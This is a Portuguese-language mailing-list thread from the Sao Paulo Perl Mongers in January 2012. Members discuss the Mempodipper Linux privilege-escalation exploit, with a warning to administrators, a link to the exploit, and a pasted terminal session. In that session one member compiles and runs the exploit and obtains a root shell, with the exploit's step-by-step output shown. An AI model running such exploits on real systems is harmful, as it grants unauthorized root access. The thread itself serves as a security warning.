Testado e aprovado. Testei a versao pra android e rolou tambem. Vejam a thread disso no FB. Ja ta antigo ja :)
2012/1/27 Alexei Znamensky <[email protected]> > > Em > > Linux alexeiz 2.6.38-13-generic-pae #53-Ubuntu SMP Mon Nov 28 19:41:58 UTC > 2011 i686 i686 i386 GNU/Linux > > nem compila. > > Eu uso muito VMWare, e o suporte aos VMTools e aos módulos que compilam no > kernel do Linux para o kernel 3.0 está quebrado (tem uns patches por aí, > mas eu não vou compilar kernel agora), então estou usando o 2.6.38 por > enquanto. > > []s, > Russian > > 2012/1/27 Daniel Mantovani <[email protected]> > >> Acabei de testar na minha vps, >> >> >> mantovani@mantovanilabs:~$ gcc mempodipper.c >> mantovani@mantovanilabs:~$ ls >> a.out apps mempodipper.c Perl perl5 >> mantovani@mantovanilabs:~$ chmod +x a.out >> mantovani@mantovanilabs:~$ ./a.out >> =============================== >> = Mempodipper = >> = by zx2c4 = >> = Jan 21, 2012 = >> =============================== >> >> [+] Ptracing su to find next instruction without reading binary. >> [+] Creating ptrace pipe. >> [+] Forking ptrace child. >> [+] Waiting for ptraced child to give output on syscalls. >> [+] Ptrace_traceme'ing process. >> [+] Error message written. Single stepping to find address. >> [+] Resolved call address to 0x4020b8. >> [+] Opening socketpair. >> [+] Waiting for transferred fd in parent. >> [+] Executing child from child fork. >> [+] Opening parent mem /proc/16574/mem in child. >> [+] Sending fd 6 to parent. >> [+] Received fd at 6. >> [+] Assigning fd 6 to stderr. >> [+] Calculating su padding. >> [+] Seeking to offset 0x4020ac. >> [+] Executing su with shellcode. >> # uname -a >> Linux mantovanilabs.com 3.0.4-x86_64-linode21 #1 SMP Thu Sep 1 21:28:01 >> EDT 2011 x86_64 GNU/Linux >> >> -- >> Software Engineer >> Just Another Perl Hacker >> Daniel Mantovani +5511 8538-9897 >> XOXO >> >> On Jan 27, 2012, at 12:02 PM, Daniel Mantovani wrote: >> >> >> http://www.techworld.com.au/article/413300/linux_vendors_rush_patch_privilege_escalation_flaw_after_root_exploits_emerge >> o exploit, http://www.exploit-db.com/exploits/18411/ >> >> Atencao administradores, o assunto 'e serio. >> >> >> -- >> Software Engineer >> Just Another Perl Hacker >> Daniel Mantovani +5511 8538-9897 >> XOXO >> >> >> >> =begin disclaimer >> Sao Paulo Perl Mongers: http://sao-paulo.pm.org/ >> SaoPaulo-pm mailing list: [email protected] >> L<http://mail.pm.org/mailman/listinfo/saopaulo-pm> >> =end disclaimer >> >> > > > -- > Alexei "RUSSOZ" Znamensky | russoz EM gmail com | http://russoz.org > GPG fingerprint = 42AB E78C B83A AE31 7D27 1CF3 C66F B5C7 71CA 9F3C > http://www.flickr.com/photos/alexeiz | http://github.com/russoz > "I don't know... fly casual!" -- Han Solo > > =begin disclaimer > Sao Paulo Perl Mongers: http://sao-paulo.pm.org/ > SaoPaulo-pm mailing list: [email protected] > L<http://mail.pm.org/mailman/listinfo/saopaulo-pm> > =end disclaimer > > -- Oscar Marques [email protected] http://www.dunkelheit.com.br @f117usbr <https://twitter.com/#%21/f117usbr> +55 21 9293-9343
=begin disclaimer Sao Paulo Perl Mongers: http://sao-paulo.pm.org/ SaoPaulo-pm mailing list: [email protected] L<http://mail.pm.org/mailman/listinfo/saopaulo-pm> =end disclaimer
